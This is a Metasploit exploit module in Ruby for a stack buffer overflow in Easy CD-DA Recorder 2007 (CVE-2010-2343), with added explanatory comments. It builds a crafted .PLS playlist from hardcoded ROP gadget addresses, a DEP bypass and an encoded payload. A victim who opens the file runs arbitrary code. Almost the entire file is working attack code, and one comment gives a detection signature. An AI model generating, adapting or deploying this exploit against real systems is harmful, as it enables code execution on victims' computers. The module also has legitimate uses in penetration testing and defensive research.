# Metasploit Framework core; the names this module references
# (Msf::Exploit::Remote, Msf::Exploit::FILEFORMAT, OptString, ...) come from here.
require 'msf/core'
# Metasploit file-format module for Easy CD-DA Recorder 2007 (CVE-2010-2343,
# BID 40631, EDB 13761, OSVDB 65256). Nothing here talks to a network: #exploit
# assembles a crafted playlist in memory and hands it to
# Msf::Exploit::FILEFORMAT#file_create, which writes it under the FILENAME option.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  # Supplies file_create and the FILENAME option handling used in #exploit.
  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata, payload constraints and the single target.
  #
  # @param info [Hash] module info supplied by the framework; merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy CD-DA Recorder PLS Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability
        in Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
        By persuading the victim to open a specially-crafted .PLS file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'chap0',
          'Gabor Seljan',
          'juan vazquez'
        ],
      'References'     =>
        [
          [ 'BID', '40631' ],
          [ 'EDB', '13761' ],
          [ 'OSVDB', '65256' ],
          [ 'CVE', '2010-2343' ],
          [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # Framework NOP padding is disabled; the buffer layout in #exploit is
          # built explicitly instead.
          'DisableNops'    => true,
          # Excluded bytes: 0x0a (LF) and 0x3d ('='). Presumably because the
          # playlist is a line-based key=value format — confirm against the parser.
          'BadChars'       => "\x0a\x3d",
          # Maximum encoded payload size in bytes accepted by this layout.
          'Space'          => 2454,
          # Raw x86 bytes prepended to the payload; 81 C4 imm32 decodes as an
          # `add esp, imm32` stack adjustment.
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
      'Targets'        =>
        [
          # 'Offset' is consumed in #exploit as a byte count (divided by 4 into
          # rop_nops dwords). 'Ret' is a fixed address written right after one
          # more literal dword — NOTE(review): valid only for the exact build the
          # module was tested against; nothing here verifies the installed version.
          [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)', { 'Offset' => 1108, 'Ret' => 0x1001b19b } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jun 7 2010',
      'DefaultTarget'  => 0))

    # FILENAME is operator-supplied (not required); defaults to msf.pls.
    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])
      ], self.class)
  end

  # Four NOP-equivalent bytes from make_nops, unpacked as one unsigned 32-bit
  # little-endian Integer so the value can sit in the dword list in #exploit.
  #
  # @return [Integer] the 4 NOP bytes as a single "V"-unpacked value
  def nops
    return make_nops(4).unpack("V").first
  end

  # n copies of one fixed little-endian dword (0x1003d55d). The author names it
  # a ROP NOP; what the address resolves to is not visible from this file.
  #
  # @param n [Integer] number of dwords to emit (default 1)
  # @return [String] 4 * n bytes
  def rop_nops(n = 1)
    [0x1003d55d].pack('V') * n
  end

  # Builds the playlist content and writes it with file_create.
  #
  # Layout, in order: Offset/4 rop_nops dwords, one literal dword, target.ret,
  # 22 more rop_nops dwords, the gadget dword list (with the #nops value spliced
  # in), the encoded payload, then 10000 random uppercase letters. Every address
  # is a literal, so the output only matches the binaries listed under 'Targets'.
  def exploit
    # Gadget addresses packed little-endian. Two entries (0x00000996, 0x00000040)
    # fall outside the address ranges of the others — presumably values consumed
    # by the chain rather than code pointers; confirm against the target build.
    # .flatten is a no-op here: every element is already an Integer.
    rop_gadgets = [
      0x1007261e,
      0x0042a0e0,
      0x1003bd6b,
      0x10035802,
      0x1005d288,
      0x004030c8,
      0x1005cc2d,
      0x00000996,
      0x1008740c,
      0x00000040,
      0x1001826d,
      0x004364c6,
      0x00404aa9,
      0x100378e6,
      0x0042527d,
      nops,          # 4 NOP bytes as one Integer, see #nops
      0x00429692
    ].flatten.pack('V*')

    # Integer division: 'Offset' is in bytes, rop_nops counts dwords.
    sploit = rop_nops(target['Offset'] / 4)
    sploit << [0x1003d55c].pack("V")
    sploit << [target.ret].pack("V")
    sploit << rop_nops(22)
    sploit << rop_gadgets
    sploit << payload.encoded
    # Trailing filler; presumably needed so the entry is long enough to trigger
    # the overflow — TODO confirm. Detection note: a 10000-character uppercase
    # run following repeated 0x1003d55d dwords is a distinctive artifact of
    # files this module produces.
    sploit << rand_text_alpha_upper(10000)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end